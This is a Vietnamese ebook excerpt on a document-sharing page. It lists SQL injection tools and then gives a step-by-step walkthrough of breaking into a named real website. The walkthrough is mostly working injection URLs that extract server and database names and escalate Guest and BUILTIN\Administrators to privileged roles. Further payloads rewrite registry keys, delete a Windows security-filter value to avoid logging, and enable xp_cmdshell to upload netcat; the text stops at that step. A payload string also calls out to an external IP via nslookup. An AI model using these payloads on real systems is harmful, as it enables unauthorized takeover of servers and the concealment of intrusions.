1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 241 ppsx

6 129 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 6
Dung lượng 219,55 KB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

vào danh sách từ điển cho riêng mình.Wpoison chạy trên Linux,có thể download tại: http://wpoison.sourceforge.net Ngoài ra còn có công cụ SPIKE Proxy,nó có các chức năng khá tốt-tự động t

Trang 1

vào danh sách từ điển cho riêng mình.Wpoison chạy trên Linux,có thể download tại:

http://wpoison.sourceforge.net

Ngoài ra còn có công cụ SPIKE Proxy,nó có các chức năng khá tốt-tự động thực hiện SQL Injection -những d0oạn string sẽ được Inject tuỳ vào thói quen người sử dụng SPIKE Proxy là 1 Python và OpenSSL-công cụ đánh giá ứng dụng web cơ bản có các chức năng như HTTP và HTTPS Proxy Nó cho phép người phát triển web hoặc người quản trị ứng dụng web cấp thấp truy cập vào tòan bộ phương tiện ứng dụng web,trong khi nó cũng cung cấp 1 nhóm các công cụ tự động và những

kĩ năng khám phá ra những lỗi thông thường,các công cụ đó bao gồm:SQL

Injection,Website Crawler,Login Form Brute Forcer,Automated Overflow

Detection v.vSpike Proxy chạy trên Win32 và Linux,các bạn có thể Download tại: www.immunitysec.com/spike.html

Chú ý là phần mềm này nặng khoảng 13M và máy tính của bạn phải có sẵn Python

và OpenSSL.Trong WinXP công cụ này không hoạt động

Mieliekoek.pl là 1 SQL Insertion Crawler,có chức năng kiểm tra các form liên quan đến lỗi SQL.Scrip này cung cấp 1 công cụ Web mirroring như là dữ liệu vào,xem xét từng file và nhân diện sự tồn tại các form trong file.Các chuỗi được Inject có thể dễ dàng thay đổi trong file cấu hình.Download Mieliekoek tại:

http://packetstormsecurity.nl/UNIX/s /mieliekoek.pl

Công cụ này chỉ hoạt động khi máy bạn đã cài PERL.Sau đây là 1 ví dụ của dữ liệu xuất từ mieliekoek:

$badstring="blah''';

#$badstring="blah' or 1=1 ";

$badstring="blah' exec master xp_cmdshell 'nslookup a.com 196.30.67.5' - ';

Trên đây hình như là tất cả các bài viết về SQL Injection bằng tiếng Việt mà

fantomas311 có , trong đó gồm các tác giả : Windak - Hoahongtim (Viethacker), Vicki , Chubehamhoc - Binhtrieu (VNISS) Ngoài ra còn vài người khác nữa ko nhớ là ai Trên đây cũng có một vài chỉnh sửa và bổ sung của Fantomas311 , tuy vậy chắc cũng còn sai sót đâu đó , anh em nào đọc thấy sai chỗ nào góp ý dùm !

Hi vọng đây có thể là một tài liệu hữu ích cho các bạn muốn tìm hiểu về SQL Injection

Thân !

fantomas311(VNISS)

Trang 2

Hack SQL Injection và nâng quyền với "sa" (bài 1)

Bài viết được hoàn thành với sự trợ giúp của : Mr NEO

TÌM KIẾM

Uhm dạo này đói kém cc ,sau một hồi tìm kiếm shop mong kiếm được chút cháo trên google thì tình cờ tìm được site

hxxp://www.darksidecreations.com/category.asp?catcode=10

Chà site sex bà coan ơi sex thì sex thêm đại dấu ' vô

hxxp://www.darksidecreations.com/category.asp?catcode=10'

KIỂM TRA

dính rồi vui quá nhào dzô check tiếp nào

hxxp://www.darksidecreations.com/category.asp?catcode=10 and

1=convert(int,@@servername) sp_password

Vậy là được Server name là : BACKUP

tiện thể làm luôn cái tên DB

hxxp://www.darksidecreations.com/category.asp?catcode=10 and

1=convert(int,db_name()) sp_password

Được Database Name là : darkside

chậc đúng là dark ( site sex mà )

Kiểm tra cái thằng system user xem nào

Trang 3

hxxp://www.darksidecreations.com/category.asp?catcode=10 and

1=convert(int,system_user) sp_password

wow hay quá nè System_User 'sa'

lúc này nghĩ ngay tới việc hack server đã thiệt

Kiểm tra coi thằng ku SAdmin nó có Enable cái OpenRowSet cho mình không ha

hxxp://www.darksidecreations.com/category.asp?catcode=10;select%20*%20from

%20openro wset('sqloledb','';;,'') sp_password

Microsoft OLE DB Provider for SQL Server error '80040e14'

Ad hoc access to OLE DB provider 'sqloledb' has been denied You must access this provider through a linked server

/category.asp, line 8

TrickyMaster(VNISS)

Hack SQL Injection và nâng quyền với "sa" (bài 2)

NÂNG & CHIẾM QUYỀN

Giờ làm gì nhỉ ??

ah đưa mình (Guest) dzô DB OWNER của DB Master

Tại sao lại phải đưa Guest vào DataBase Owner cuar DataBase Master?

Bở vì la` DB Owner của Db Master mới có quyền thực hiện lệnh

xp_regwrite,xp_regdeletevalue và xp_cmdshell

Tại sao Guest lại sử dụng 2 lệnh xp_regwrite,xp_regdeletevalue và

xp_cmdshell

Bởi vì :

xp_regwrite dùng để thực hiện lệnh ghi lên Registry của Windows

xp_regdeletevalue dùng để xóa dữ liệu trong Registry của Windows

xp_cmdshell dùng để gửi lệnh lên Windows dùng đề nâng quyền , chiếm quyền , cài backdoor

Còn đây là lệnh để đưa Guest vào Db Owner của Db Master

Trang 4

hxxp://www.darksidecreations.com/category.asp?catcode=10;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysusers'exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set sid=0x01,roles=0x01 where name=''Guest''','xx' exec

sp_executesql N'drop view dbo.test' sp_password

Nếu chạy links trên mà không báo lỗi và được trả về trang :

hxxp://www.darksidecreations.com/category.asp?catcode=10

tức là bạn đã thực hiện thành công việc đưa Guest vào Db Owner của Db Master nhưng để cho chắc ăn mình vẫn kiểm tra lại một lần nữa bằng cách sau :

hxxp://www.darksidecreations.com/category.asp?catcode=10%20%20and%201=c onvert(int,( select%20top%201%20name%20from%20master sysusers%

20where%20roles=0x01%20and%20name%20not%20in('dbo' ))) sp_password

Vậy là xong giờ thì thoải mái chạy xp_regwrite với cả xp_cmdshell

Có thể chạy xp_regwrite ,xp_regdeletevalue với xp_cmdshell rồi thì làm gì ??? Giờ login vào Database với user BUILTIN\ADMINISTRATOR với password = "" chạy thế này ;

hxxp://www.darksidecreations.com/category.asp?catcode=10;exec%20sp_executes ql%20N'c reate%20view%20dbo.test%20as%20select%20*%20from%2

0master.dbo.sysxlogins'%20exec%20sp_msdropretry%20

'xx%20update%20sysusers%20set%20sid=0x01%20where%2

0name=''dbo''','xx'%20exec%20sp_msdropretry%20'xx%

20update%20dbo.test%20set%20xstatus=18%20where%20n

ame=''BUILTIN\ADMINISTRATORS''','xx'%20exec%20sp_e

xecutesql%20N'drop%20view%20dbo.test' sp_password

Vậy là ta có một chú nằm vùng trong Db của nó he he sau này mọi mệnh lệnh đề phải thông qua chú này

Nhưng giờ xài xp_regwrite trước ha

Giờ mình dùng xp_regwrite để Enable cái OpenRowset đã bị thằng ku SysAdmin kia Disable ( tuy giờ đã Enable nhưng mình vẫn viết ra để các bạn biết )

hxxp://www.darksidecreations.com/category.asp?catcode=10;exec

Trang 5

master xp_regwrite

HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer

\Providers\SQLOLEDB','AllowInProcess',REG_DWORD,1 sp_password

hxxp://www.darksidecreations.com/category.asp?catcode=10;exec

master xp_regwrite

HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer

\Providers\SQLOLEDB','DisallowAdhocAccess',REG_DWORD,0 sp_password

Để ý mấy chỗ in đậm nhé:

1 : Enable

0 : Disable

he he chạy mà nó trả về trang chủ là thành công khỏi check

Giờ thì xài cái thằng xp_regdeletevalue để hủy chức năng ghi log và lọc dữ liệu của WINDOWS

hxxp://www.darksidecreations.com/category.asp?catcode=10;exec

master xp_regdeletevalue

'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Ser

vices\Tcpip\Parameters','EnableSecurityFilters' sp_password

Giờ thì các bạn khỏi lo bị ghi log chính vì thế mình bỏ cái sp_password đi cũng được ^_^ nhưng bạn để lại cũng chẳng sao

Giờ đến lúc bật cái xp_cmdshell lên à các bạn lưu ý nha ở trên là cho phép chạy xp_cmdshell còn ở đây là bật xp_cmdshell và allow updates kẻo lại chửi oan mình thì chết

hxxp://www.darksidecreations.com/category.asp?catcode=10;select * from

openrowset('sqloledb', 'server=BACKUP;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override') sp_password

TrickyMaster(VNISS)

Hack SQL Injection và nâng quyền với "sa" (bài 3)

Trang 6

Vậy là xong giờ thì dùng tới thằng xp_cmdshell để upload netcat Giờ các bạn chuẩn bị cho mình thế này:

Ngày đăng: 04/07/2014, 12:20

TỪ KHÓA LIÊN QUAN